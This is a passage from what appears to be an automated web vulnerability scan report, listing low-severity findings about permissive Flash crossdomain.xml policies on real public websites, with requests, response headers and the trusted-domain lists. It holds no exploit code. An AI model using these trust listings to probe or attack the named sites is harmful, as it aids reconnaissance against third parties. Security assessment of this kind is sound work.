<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.nbbcdev.com" />
<allow-access-from domain="*.nbbc.com" />
<allow-access-from domain="*.nbc.com" />
<allow-access-from domain="*.dundermifflininfinity.com" />
<allow-access-from domain="*.bunchball.com" />
...[SNIP]...

6.157. http://www.film4.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.film4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.film4.com

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=922
Content-Type: text/html; charset=UTF-8
Date: Wed, 04 May 2011 03:40:06 GMT
Keep-Alive: timeout=15, max=98
Accept-Ranges: bytes
Connection: close
Last-Modified: Tue, 05 Apr 2011 15:11:56 GMT
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache-Info: caching
Content-Length: 339

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <allow-access-from domain="*.channel4.com" secure="true"/>
   <allow-access-from domain="*.brightcove.com" secure="true"/>
   <allow-access-from domain="realmedia.channel4.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.film4.com" secure="true"/>
...[SNIP]...

6.158. http://www.foxsportsmidwest.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.foxsportsmidwest.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foxsportsmidwest.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 08 Nov 2010 18:35:16 GMT
ETag: "1cd9ee98-d9-e2ab8100"
Accept-Ranges: bytes
Content-Length: 217
Content-Type: application/xml
Date: Wed, 04 May 2011 04:14:17 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.edgecastcdn.net" />
<allow-access-from domain="*.brandaffinity.net" />
<allow-access-from domain="*.netbat.com" />
</cro
...[SNIP]...

6.159. http://www.goldaffiliateprogram.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.goldaffiliateprogram.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goldaffiliateprogram.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:05:16 GMT
Server: Apache/2.2.16 (Unix)
Vary: Host
Last-Modified: Fri, 17 Oct 2008 14:23:20 GMT
ETag: "da-45973b505a600"
Accept-Ranges: bytes
Content-Length: 218
X-Server-Name: www@dc1dtweb16
Keep-Alive: timeout=3, max=998
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.directtrack.com" />
</cro
...[SNIP]...

6.160. http://www.golfholiday.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.golfholiday.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.golfholiday.com

Response

HTTP/1.1 200 OK
Content-Length: 313
Content-Type: text/xml
Content-Location: http://www.golfholiday.com/crossdomain.xml
Last-Modified: Fri, 16 Jan 2009 15:40:11 GMT
Accept-Ranges: bytes
ETag: "80ff6cb7f077c91:1ea394"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:44:29 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*.ifg.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

6.161. http://www.hutchnews.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.hutchnews.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hutchnews.com

Response

HTTP/1.1 200 OK
Content-Length: 1158
Content-Type: text/xml
Content-Location: http://www.hutchnews.com/crossdomain.xml
Last-Modified: Mon, 28 Mar 2011 20:37:52 GMT
Accept-Ranges: bytes
ETag: "31704e288edcb1:0"
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:23:27 GMT
Connection: close
Set-Cookie: NSC_DNTQ-OfxDNT=ffffffff09021f3545525d5f4f58455e445a4a423660;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.mediaspanonline.com" />
<allow-access-from domain="mediaspanonline.com" />
<allow-access-from domain="*.mediaspanonline.com" />
<allow-access-from domain="assets.mediaspanonline.com" />
<allow-access-from domain="*.nassauguardian.net" />
<allow-access-from domain="*.thenassauguardian.net" />
<allow-access-from domain="*.thenassauguardian.com" />
<allow-access-from domain="thenassauguardian.com" />
<allow-access-from domain="thenassauguardian.net" />
<allow-access-from domain="nassauguardian.net" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.cocentral.com" />
<allow-access-from domain="*.mediaspangroup.com" />
<allow-access-from domain="*.mediaspansoftware.com" />
<allow-access-from domain="*.fimc.net" />
<allow-access-from domain="*.firstmediaworks.com" />
<allow-access-from domain="*.firstmediaworks.net" />
<allow-access-from domain="*.firstmediaworks.org" />
...[SNIP]...

6.162. http://www.icelandair.is/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.icelandair.is
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.icelandair.is

Response

HTTP/1.1 200 OK
Set-Cookie: icelb=R3919127566; path=/; expires=Thu, 05-May-2011 02:31:43 GMT
Date: Wed, 04 May 2011 02:23:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 27 Aug 2009 11:39:06 GMT
Accept-Ranges: bytes
Content-Length: 544
Vary: Accept-Encoding,User-Agent
Cache-Control: public, max-age=240
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.icelandair.is"/>
<allow-access-from domain="icelandair.is"/>
<allow-access-from domain="*.mbl.is" />
<allow-access-from domain="mbl.is" />
<allow-access-from domain="*.gagarin.is" />
<allow-access-from domain="gagarin.is" />
<allow-access-from domain="*.icelandair.net"/>
<allow-access-from domain="icelandair.net"/>
...[SNIP]...

6.163. http://www.ifamouz.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ifamouz.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ifamouz.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 02:43:39 GMT
Content-Type: text/xml
Content-Length: 294
Last-Modified: Wed, 23 Mar 2011 16:47:08 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*.arrematenoleilao.com" />

<allow-access-from domain="*.arrematenoleilao.com.br" />
...[SNIP]...

6.164. http://www.imbc.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.imbc.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.imbc.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Length: 507
Content-Type: text/xml
Last-Modified: Tue, 29 Mar 2011 03:47:04 GMT
Accept-Ranges: bytes
ETag: "06caef7c3edcb1:6fe"
Date: Wed, 04 May 2011 01:06:11 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="swf.imbc.com" />
<allow-access-from domain="imbbs.imbc.com" />
<allow-access-from domain="withmbc.imbc.com" />
<allow-access-from domain="edu.imbc.com" />
<allow-access-from domain="*.imbc.com" />
<allow-access-from domain="conting.imbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="img.sbs.co.kr"/>
...[SNIP]...

6.165. http://www.indavideo.hu/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.indavideo.hu
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.indavideo.hu

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Accept-Ranges: bytes
ETag: "1522340670"
Last-Modified: Wed, 01 Dec 2010 05:19:27 GMT
Content-Length: 322
Connection: close
Date: Wed, 04 May 2011 02:36:53 GMT
Server: lighttpd/1.4.28

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.indavideo.hu"/>
<allow-access-from domain="*.index.hu"/>
...[SNIP]...

6.166. http://www.intermediaoutdoors.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.intermediaoutdoors.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intermediaoutdoors.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:04:36 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 27 Oct 2009 16:47:53 GMT
ETag: "14fc81a-460-7076c040"
Accept-Ranges: bytes
Content-Length: 1120
Connection: close
Content-Type: text/xml

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.google-analytics.com"/>
<allow-access-from domain="*.floridasportsman.com"/>
<allow-access-from domain="*.gunsandammomag.com"/>
<allow-access-from domain="*.in-fisherman.com"/>
<allow-access-from domain="*.flyfisherman.com"/>
<allow-access-from domain="*.petersenshunting.com"/>
<allow-access-from domain="*.northamericanwhitetail.com"/>
<allow-access-from domain="*.gameandfishmag.com"/>
<allow-access-from domain="*.arrowaffliction.tv"/>
<allow-access-from domain="*.tacticalimpact.tv"/>
<allow-access-from domain="*.gunsandammotv.tv"/>
<allow-access-from domain="*.tacticalarms.tv"/>
<allow-access-from domain="*.predatornation.tv"/
<allow-access-from domain="*.handgunstv.com"/
<allow-access-from domain="*.nawt.tv"/
<allow-access-from domain="*.bowhunter.tv"/
<allow-access-from domain="*.petersenshunting.tv"/
</cross-domain-policy>
...[SNIP]...

6.167. http://www.junodownload.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.junodownload.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.junodownload.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:55:42 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 12:15:29 GMT
Accept-Ranges: bytes
Content-Length: 340
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" />
   <allow-access-from secure="false" domain="*.juno.co.uk" />
   <allow-access-from secure="false" domain="*.junodownload.com" />
   <allow-access-from secure="false" domain="www.junostatic.com" />
...[SNIP]...

6.168. http://www.kboi2.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.kboi2.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kboi2.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 02 May 2011 05:07:07 GMT
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/xml;charset=utf-8
Date: Wed, 04 May 2011 01:58:39 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0
X-N: S

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...

6.169. http://www.keepbusy.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.keepbusy.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.keepbusy.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:30:39 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.10
Last-Modified: Wed, 07 Oct 2009 15:29:32 GMT
ETag: "f50028-de-4755a036faf00"
Accept-Ranges: bytes
Content-Length: 222
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>


<allow-access-from domain="*.keepbusy.net" />


<
...[SNIP]...

6.170. http://www.keprtv.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.keprtv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.keprtv.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 19 Apr 2011 18:57:34 GMT
X-Server-Name: dv-c1-r1-u24-b4
Content-Type: text/xml;charset=utf-8
Date: Wed, 04 May 2011 01:12:10 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0
X-N: S

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
<allow-access-from domain="*.belo.com"/>
<allow-access-from domain="*.centralillinoisnewscenter.com"/>
<allow-access-from domain="*.cbs3springfield.com"/>
<allow-access-from domain="*.explorepolitics.com"/>
<allow-access-from domain="*.granitetv.com"/>
<allow-access-from domain="*.indianasnewscenter.com"/>
<allow-access-from domain="*.katu.com"/>
<allow-access-from domain="*.kcby.com"/>
<allow-access-from domain="*.kcrg.com"/>
<allow-access-from domain="*.kens5.com"/>
<allow-access-from domain="*.keprtv.com"/>
<allow-access-from domain="*.keyt.com"/>
<allow-access-from domain="*.kfbb.com"/>
<allow-access-from domain="*.kgw.com"/>
<allow-access-from domain="*.khou.com"/>
<allow-access-from domain="*.kidk.com"/>
<allow-access-from domain="*.kimatv.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.klewtv.com"/>
<allow-access-from domain="*.kmov.com"/>
<allow-access-from domain="*.knin.com"/>
<allow-access-from domain="*.komonews.com"/>
<allow-access-from domain="*.kpic.com"/>
<allow-access-from domain="*.krem.com"/>
<allow-access-from domain="*.ksee24.com"/>
<allow-access-from domain="*.ksbitv.com"/>
<allow-access-from domain="*.ktnv.com"/>
<allow-access-from domain="*.ktvb.com"/>
<allow-access-from domain="*.clickability.com"/>
<allow-access-from domain="*.kval.com"/>
<allow-access-from domain="*.kvi.com"/>
<allow-access-from domain="*.kvue.com"/>
<allow-access-from domain="*.kulr8.com"/>
<allow-access-from domain="*.northlandsnewscenter.com"/>
<allow-access-from domain="*.nwcn.com"/>
<allow-access-from domain="*.star1015.com"/>
<allow-access-from domain="*.tv20detroit.com"/>
<allow-access-from domain="*.wbng.com"/>
<allow-access-from domain="*.wcnc.com"/>
<allow-access-from domain="*.wdtv.com"/>
<allow-access-from domain="*.whas11.com"/>
<allow-access-from domain="*.wkbw.com"/>
<allow-access-from domain="*.wwltv.com"/>
<allow-access-from domain="*.wltz.com"/>
<allow-access-from domain="*.wnky.net"/>
<allow-access-from domain="*.wfaa.com"/>
<allow-access-from domain="*.wvec.com"/>
<allow-access-from domain="*.abc6.com"/>
<allow-access-from domain="*.wktv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.kjzz.com"/>
<allow-access-from domain="*.abcmontana.com"/>
<allow-access-from domain="*.wncftv.com"/>
<allow-access-from domain="*.ugclocal.com"/>
<allow-access-from domain="*.kmvt.com"/>
<allow-access-from domain="*.cnn.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.wmdntv.com"/>
<allow-access-from domain="*.wgbctv.com"/>
<allow-access-from domain="*.nbcuxd.com"/>
<allow-access-from domain="*.bakersfieldnow.com"/>
<allow-access-from domain="*.indiancountrytoday.com"/>
<allow-access-from domain="*.indiancountry.com"/>
<allow-access-from domain="*.pro8news.com"/>
<allow-access-from domain="*.oneidaindiannation.com"/>
<allow-access-from domain="*.oneidanation.net"/>
<allow-access-from domain="*.kofytv.com"/>
<allow-access-from domain="*.wrdetv.com"/>
<allow-access-from domain="*.lively-nation.com"/>
<allow-access-from domain="*.ucdailynews.com"/>
<allow-access-from domain="*.wjys.tv"/>
<allow-access-from domain="*.wavenewspapers.com"/>
<allow-access-from domain="*.wwnytv.com"/>
<allow-access-from domain="*.laindependent.com"/>
<allow-access-from domain="*.fox24.com"/>
<allow-access-from domain="*.cachevalleydaily.com"/>
<allow-access-from domain="bim.images.vidavee.com"/>
<allow-access-from domain="*.king5.com"/>
<allow-access-from domain="*.sharinghope.tv"/>
<allow-access-from domain="*.azfamily.com"/>
<allow-access-from domain="*.wpsdlocal6.com"/>
<allow-access-from domain="*.bimvid.com"/>
<allow-access-from domain="*.fox11az.com"/>
<allow-access-from domain="*.kissfmnews.com"/>
<allow-access-from domain="*.mychristiantv.net"/>
<allow-access-from domain="*.cheeseheadtalk.com"/>
<allow-access-from domain="*.myfoxmaine.com"/>
<allow-access-from domain="*.foxcharlotte.com"/>
<allow-access-from domain="*.wfrv.com"/>
<allow-access-from domain="*.wfxb.com"/>
<allow-access-from domain="*.newscentralga.com"/>
<allow-access-from domain="*.worcestermag.com"/>
<allow-access-from domain="*.khastv.com"/>
<allow-access-from domain="*.krextv.com"/>
<allow-access-from domain="*.bimlocal.com"/>
<allow-access-from domain="*.foxillinois.com"/>
<allow-access-from domain="*.thetobagonews.com"/>
<allow-access-from domain="*.trinidadexpress.com"/>
<allow-access-from domain="*.reachcaribbean.com"/>
<allow-access-from domain="*.klassicgrenada.com"/>
<allow-access-from domain="*.sixpointtt.com"/>
<allow-access-from domain="*.trinivoices.com"/>
<allow-access-from domain="*.fox50.com"/>
<allow-access-from domain="*.youralaskalink.com"/>
<allow-access-from domain="*.thehomeforinnovation.com"/>
<allow-access-from domain="*.classicrock102.net"/>
<allow-access-from domain="test.library.contentexchange.titantv.com"/>
<allow-access-from domain="*.titantv.com"/>
<allow-access-from domain="*.decisionmark.com"/>
<allow-access-from domain="*.newstalkkcrs.com"/>
<allow-access-from domain="*.1033kissfm.net"/>
<allow-access-from domain="*.mymix1067.com"/>
<allow-access-from domain="*.mycountry961.com"/>
<allow-access-from domain="*.myironmanstory.com"/>
<allow-access-from domain="*.kcwx.com"/>
<allow-access-from domain="*.ncwtv.com"/>
<allow-access-from domain="*.wktctv.com"/>
<allow-access-from domain="*.krbkhd.com"/>
<allow-access-from domain="*.ktva.com"/>
<allow-access-from domain="*.baystateparent.com"/>
<allow-access-from domain="*.itsyourbiz.com"/>
<allow-access-from domain="*.accuweather.com"/>
<allow-access-from domain="*.kmvt-1.com"/>
<allow-access-from domain="*.wbbjtv.com"/>
<allow-access-from domain="*.abccolumbia.com"/>
<allow-access-from domain="*.ntwinecx.com"/>
<allow-access-from domain="*.ntwineapp.com"/>
<allow-access-from domain="*.sbtv.com"/>
<allow-access-from domain="*.allbusiness.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hoovers.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dnb.com" secure="false"/>
...[SNIP]...

6.171. http://www.kerrang.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.kerrang.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kerrang.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:18 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 25 Mar 2010 11:53:49 GMT
ETag: "8111f9-f4-b3278d40"
Accept-Ranges: bytes
Content-Length: 244
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=900
Expires: Wed, 04 May 2011 01:22:18 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

    <cross-domain-policy>

    <allow-access-from domain="*.kerrang.com" />
...[SNIP]...

6.172. http://www.kimatv.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.kimatv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kimatv.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 30 Apr 2011 15:57:06 GMT
X-Server-Name: sj-c14-r8-u22-b4
Content-Type: text/xml;charset=utf-8
Date: Wed, 04 May 2011 03:34:50 GMT
Content-Length: 7031
Connection: close
Set-Cookie: click_mobile=0
X-N: S

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.bimtv3.bimedia.net"/>
<allow-access-from domain="*.bimtv.bimedia.net"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*.younewstv.com"/>
<allow-access-from domain="*.broadcast-interactive.com"/>
<allow-access-from domain="*.media.broadcast-interactive.com"/>
<allow-access-from domain="*.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*echo.bimedia.net"/>
<allow-access-from domain="*echo2.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*alpha.bimedia.net"/>
<allow-access-from domain="*content.bimedia.net"/>
<allow-access-from domain="*.2news.tv"/>
<allow-access-from domain="*.aksuperstation.com"/>
